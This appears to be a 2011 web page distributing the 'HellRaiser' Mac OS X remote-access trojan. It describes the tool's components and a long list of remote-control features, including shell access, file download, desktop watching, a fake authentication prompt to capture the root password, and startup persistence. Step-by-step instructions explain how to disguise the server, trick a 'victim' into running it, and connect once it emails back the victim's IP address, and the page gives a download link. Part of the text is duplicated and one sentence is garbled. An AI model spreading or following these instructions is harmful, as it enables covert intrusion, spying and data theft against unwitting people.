HellRaiser is a new Mac OS X trojan system coded by DCHKG (active member of the Underground
Mac Programming Team). The word "trojan" terrifies most of people, but actually a trojan system is
not more that two applications communicating through a network (client (master) / server (slave)).
HellRaiser consists of 5 application :
- the Server is the trojan itself. When you launch it, its icon does not appear in the dock
and if you want to quit it you have to open the Activity monitor (/Applications/Utilities/) and kill
the process.
- the Client controls the server in order to manipulate the computer where the server is
- the Configurator sets the server's initial parameters (port, password, etc.) and the server's
- the SMTP Grabber is a fake smtp server customized to catch the server "phone home" email.
- Backgrounder is lame code that gives you the choice to background the server.
How to use:
Important notes:
Download :: http://www.mediafire.com/?86ebh7n41y067i8
©2011, copyright BLACK BURN
Mac Programming Team). The word "trojan" terrifies most of people, but actually a trojan system is
not more that two applications communicating through a network (client (master) / server (slave)).
HellRaiser consists of 5 application :
- the Server is the trojan itself. When you launch it, its icon does not appear in the dock
and if you want to quit it you have to open the Activity monitor (/Applications/Utilities/) and kill
the process.
- the Client controls the server in order to manipulate the computer where the server is
- the Configurator sets the server's initial parameters (port, password, etc.) and the server's
- the SMTP Grabber is a fake smtp server customized to catch the server "phone home" email.
- Backgrounder is lame code that gives you the choice to background the server.
* Configure server port and password ; * Configure server connection-alive-keeper mode ; * Configure server auto-duplication mode ; * Make server auto-duplicate and add copies to startup items ; * Retrieve server IP address by email ; * Request user authentication so as to get root password ; * Change server port ; * Change server password ; * Send messages ; * Speak messages ; * Print messages ; * Chat with host ; * Move host's chat window ; * Set host's chat window to fullscreen ; * Set host's nickname ; * Play sounds (loop mode exist) ; * Show pictures ; * Play videos (loop & palindrome modes exist) in chosen size ; * Set media playing sound volume ; * Transform host server into an invisible orchestra (choose instrument, pitch & velocity) or rythmic box (choose period) ; * Show URL in host's default web browser ; * Open host's default mailer (choose email address & subject) ; * Open host's shell, execute shell commands ; * Manage host hard disk content (list, rename, create folder, move, copy, trash, delete, make visible/invisible, launch, eject) ; * Download host's files and directories, resume downloads ; * Upload host's files and directories, resume uploads ; * Logout host ; * Restart host's macintosh ; * Shutdown host's macintosh ; * Make host's macintosh sleep ; * Set host's system sound volume ; * Execute AppleScripts ; * Watch host's desktop ; * Open/close CD-rom tray ; * Set host's clipboard ; * Delete host's clipboard ; * Show host's clipboard ; * Save host's clipboard ; * Search host hard disk content (mdfind/spotlight or locate), eventually by attributes.
1. Launch HellRaiser Configurator in order to configure the server. You have to specify a port that must be superior to 1024 except if the server is launched with root privileges. Then you are able to enter a password. If you don't want to protect the server with a password, then anybody will be able to connect to the server by the client, provided he gets the server's port of course. Also specify your email address and a smtp server's address/port. When the server is launched, it sends to this email address using the smtp server's address (e.g. : smtp.wanadoo.fr) (make sure that the smtp server accepts to send email to your email address) and port (should be 25) the IP address of the computer where the server is installed. You need this IP address to use the client. Finally, choose the server's behavior that you prefer and click "configure server" to locate HellRaiser Server 3.5 and configure it. 2. Manage to make someone that have internet access accept the server (rename it or do anything you want, just be smart...) and launch it. 3. Check you emails, you should have received one of which subject is "HellRaiser has been installed !", copy the IP address in the clipboard. 4. Launch HellRaiser Client, paste the IP address from the clipboard into the "IP address" field ("Victim's Parameters") and fill in the "port" field ("Victim's Parameters") with the server's port number you specified with HellRaiser Configurator. Don't forget to enter the right password into the "password" field ("HellRaiser"/"Your Parameters"). Then click "connect" in order to connect to the server. If the connection fails then one of the parameters may be wrong or the server is no longer online (your victim killed it or he/she has been discosucceeds then it's time to have fun ;-).
Important notes:
* You can test the server in offline localhost mode : you launch both the server and the client (configure server's behavior to "never, just waits until connection is active"). IP address is "localhost" or "" or "" (they are all the same) in that case and you don't need to connect to the network. * HellRaiser Server 3.7 can not infect any computer, it does not multiply in any way UNLESS the configuration option called "HellRaiser auto-duplicates and adds itself to login items so as to run at startup" is activated. * To get rid of HellRaiser Server 3.7 just kill it using the Activity monitor (/Applications/Utilities/) or restart your computer. * Please sent me feedback about bugs.
©2011, copyright BLACK BURN
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